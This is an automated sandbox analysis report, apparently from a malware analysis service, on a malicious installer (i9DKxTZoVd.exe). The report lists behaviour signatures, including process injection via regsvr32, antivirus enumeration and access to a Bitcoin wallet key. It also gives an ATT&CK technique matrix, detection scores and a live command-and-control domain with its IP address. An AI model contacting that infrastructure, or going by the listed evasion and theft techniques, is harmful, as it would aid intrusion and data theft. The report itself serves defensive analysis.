Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB9909BA70 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,ReadFileEx,SleepEx,GetLastError,14_2_00007FFB9909BA70
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB990119D0 GetProcessTimes,GetSystemTimes,GetProcessIoCounters,OpenProcessToken,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,CloseHandle,NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,memcpy,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,RtlFreeHeap,memset,GetModuleFileNameExW,K32GetModuleFileNameExW,GetProcessTimes,14_2_00007FFB990119D0
Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFB98FFDD10 CallNtPowerInformation,GetLogicalProcessorInformationEx,GetLogicalProcessorInformationEx,TlsGetValue,TlsGetValue,TlsSetValue,TlsGetValue,TlsGetValue,ProcessPrng,TlsGetValue,TlsSetValue,TlsGetValue,TlsGetValue,TlsGetValue,TlsSetValue,TlsGetValue,TlsGetValue,TlsGetValue,TlsSetValue,TlsGetValue,memset,RtlGetVersion,14_2_00007FFB98FFDD10
Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: regsvr32.exe, 00000009.00000003.101750988707.00000000050D4000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101957876341.000000000522F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101942743810.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101951234755.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101935437421.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101954673010.000000000509C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101953465568.00000000050BA000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101955689436.00000000050C7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101939285418.00000000050D5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101929916037.00000000050D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procdump.exe
Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

barindex
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts321
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Disable or Modify Tools
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
1
Windows Service
1
Windows Service
1
Deobfuscate/Decode Files or Information
LSASS Memory227
System Information Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Standard Port
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
1
Scheduled Task/Job
213
Process Injection
2
Obfuscated Files or Information
Security Account Manager1
Network Share Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Scheduled Task/Job
Login Hook1
Scheduled Task/Job
1
DLL Side-Loading
NTDS641
Security Software Discovery
Distributed Component Object ModelInput Capture11
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell
Network Logon ScriptNetwork Logon Script1
Masquerading
LSA Secrets2
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Modify Registry
Cached Domain Credentials341
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items341
Virtualization/Sandbox Evasion
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job213
Process Injection
Proc Filesystem2
System Owner/User Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572121 Sample: i9DKxTZoVd.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 71 1hvnc.duckdns.org 2->71 77 Suricata IDS alerts for network traffic 2->77 79 Multi AV Scanner detection for dropped file 2->79 81 Multi AV Scanner detection for submitted file 2->81 85 2 other signatures 2->85 14 i9DKxTZoVd.exe 2 2->14         started        17 regsvr32.exe 2->17         started        signatures3 83 Uses dynamic DNS services 71->83 process4 file5 67 C:\Users\user\AppData\...\i9DKxTZoVd.tmp, PE32 14->67 dropped 20 i9DKxTZoVd.tmp 3 4 14->20         started        75 Suspicious powershell command line found 17->75 23 powershell.exe 17->23         started        signatures6 process7 file8 55 C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32 20->55 dropped 57 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 20->57 dropped 26 cmd.exe 1 20->26         started        87 Loading BitLocker PowerShell Module 23->87 28 conhost.exe 23->28         started        signatures9 process10 process11 30 i9DKxTZoVd.exe 2 26->30         started        33 conhost.exe 26->33         started        35 timeout.exe 1 26->35         started        file12 69 C:\Users\user\AppData\...\i9DKxTZoVd.tmp, PE32 30->69 dropped 37 i9DKxTZoVd.tmp 19 7 30->37         started        process13 file14 59 C:\Users\user\AppData\Roaming\is-N7DV6.tmp, PE32+ 37->59 dropped 61 C:\Users\user\AppData\...\Swallow.dat (copy), PE32+ 37->61 dropped 63 C:\Users\user\AppData\...\unins000.exe (copy), PE32 37->63 dropped 65 3 other files (none is malicious) 37->65 dropped 40 regsvr32.exe 37->40         started        process15 process16 42 regsvr32.exe 2 2 40->42         started        dnsIp17 73 1hvnc.duckdns.org 88.99.161.62, 49761, 49762, 49763 HETZNER-ASDE Germany 42->73 89 System process connects to network (likely due to code injection or exploit) 42->89 91 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 42->91 93 Suspicious powershell command line found 42->93 95 7 other signatures 42->95 46 powershell.exe 37 42->46         started        49 powershell.exe 37 42->49         started        signatures18 process19 signatures20 97 Loading BitLocker PowerShell Module 46->97 51 conhost.exe 46->51         started        53 conhost.exe 49->53         started        process21

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
i9DKxTZoVd.exe39%ReversingLabsWin32.Ransomware.Generic
i9DKxTZoVd.exe22%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\is-KU6E7.tmp\i9DKxTZoVd.tmp2%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-LKP6G.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-LKP6G.tmp\_isetup\_shfoldr.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-O75JM.tmp\i9DKxTZoVd.tmp2%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-TP7FD.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-TP7FD.tmp\_isetup\_shfoldr.dll0%ReversingLabs
C:\Users\user\AppData\Local\is-8SV5O.tmp4%ReversingLabs
C:\Users\user\AppData\Local\unins000.exe (copy)4%ReversingLabs
C:\Users\user\AppData\Roaming\Swallow.dat (copy)26%ReversingLabsWin64.Trojan.Generic
C:\Users\user\AppData\Roaming\is-N7DV6.tmp26%ReversingLabsWin64.Trojan.Generic
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.micrm/pki/certs/MicR_2010-06-23.crt00%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.pngXzA0%Avira URL Cloudsafe
http://www.innosetup.com/0%Avira URL Cloudsafe
https://tst-gameplayapi.intel.com/api/games/getagsgames2/)0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.pngh0%Avira URL Cloudsafe
https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/g0%Avira URL Cloudsafe
https://tst-gameplayapi.intel.com/api/games/getagsgames2/m0%Avira URL Cloudsafe
https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/E0%Avira URL Cloudsafe
http://crl.microso0%Avira URL Cloudsafe
http://www.quovadis.bm00%Avira URL Cloudsafe
https://tst-gameplayapi.intel.com/api/games/getagsgames2/0%Avira URL Cloudsafe
http://www.remobjects.com/ps0%Avira URL Cloudsafe
https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/.0%Avira URL Cloudsafe
http://cacerts.digic0%Avira URL Cloudsafe
https://oneget.org0%Avira URL Cloudsafe
https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/0%Avira URL Cloudsafe
https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/0%Avira URL Cloudsafe
http://www.innosetup.com/1%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
1hvnc.duckdns.org
88.99.161.62
truetrue
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.innosetup.com/i9DKxTZoVd.exe, 00000000.00000003.101663444971.0000000002500000.00000004.00001000.00020000.00000000.sdmp, i9DKxTZoVd.exe, 00000000.00000003.101663862917.000000007FD30000.00000004.00001000.00020000.00000000.sdmp, i9DKxTZoVd.tmp, 00000001.00000000.101665254233.0000000000401000.00000020.00000001.01000000.00000004.sdmp, i9DKxTZoVd.tmp.0.drfalse
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    https://api.msn.com/v1/news/Feed/Windows?regsvr32.exe, 00000009.00000003.101731450336.0000000005084000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101953113164.0000000005239000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101732892581.0000000005084000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101733366336.0000000005098000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101953392054.0000000005255000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952282689.0000000005239000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102031668502.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101871816850.000000000545D000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.101798259193.000002A4DE8C5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.101779809519.000002A4CFD3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101896209492.0000025DB1525000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA29A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101994038719.000001E26D311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpfalse
        high
        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000C.00000002.101837470212.0000025DA256D000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://www.micrm/pki/certs/MicR_2010-06-23.crt0powershell.exe, 0000000C.00000002.101908630743.0000025DB9CC6000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://tst-gameplayapi.intel.com/api/games/getagsgames2/)regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101908630743.0000025DB9CC6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlXzApowershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101908630743.0000025DB9CC6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.102005654098.000001E2753B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://pesterbdd.com/images/Pester.pngXzApowershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://pesterbdd.com/images/Pester.pnghpowershell.exe, 0000000C.00000002.101837470212.0000025DA2853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://gameplayapi.intel.com/api/games/getagsgamesettings2/Cregsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://contoso.com/Licensepowershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Iconpowershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://docs.rs/getrandom#nodejs-es-module-supporti9DKxTZoVd.tmp, 00000007.00000003.101705778461.0000000006000000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, regsvr32.exe, 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpfalse
                        high
                        https://gameplayapi.intel.com/api/games/getagsgamesettings2/regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/gregsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://tst-gameplayapi.intel.com/api/games/getagsgames2/mregsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://gameplayapi.intel.com/api/games/getagsgamesettings2/Yregsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://github.com/Pester/Pesterpowershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101908630743.0000025DB9CC6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://tst-gameplayapi.intel.com/api/games/getagsgamesettings2/Eregsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/Pester/PesterXzApowershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://gameplayapi.intel.com/api/games/getagsgames2/rregsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://crl.microsopowershell.exe, 0000000F.00000002.102015220848.000001E27587D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.101779809519.000002A4CEA7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA16DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/powershell.exe, 0000000F.00000002.101919557191.000001E25E72F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://gameplayapi.intel.com/api/games/getagsgamesettings2/#regsvr32.exe, 00000009.00000003.101734444126.0000000005286000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101734444126.000000000527E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101952377109.000000000529F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101876830513.00000000057B8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005510000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102033434819.0000000005518000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://github.com/Pester/Pesterhpowershell.exe, 0000000C.00000002.101837470212.0000025DA2853000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.101837470212.0000025DA2827000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
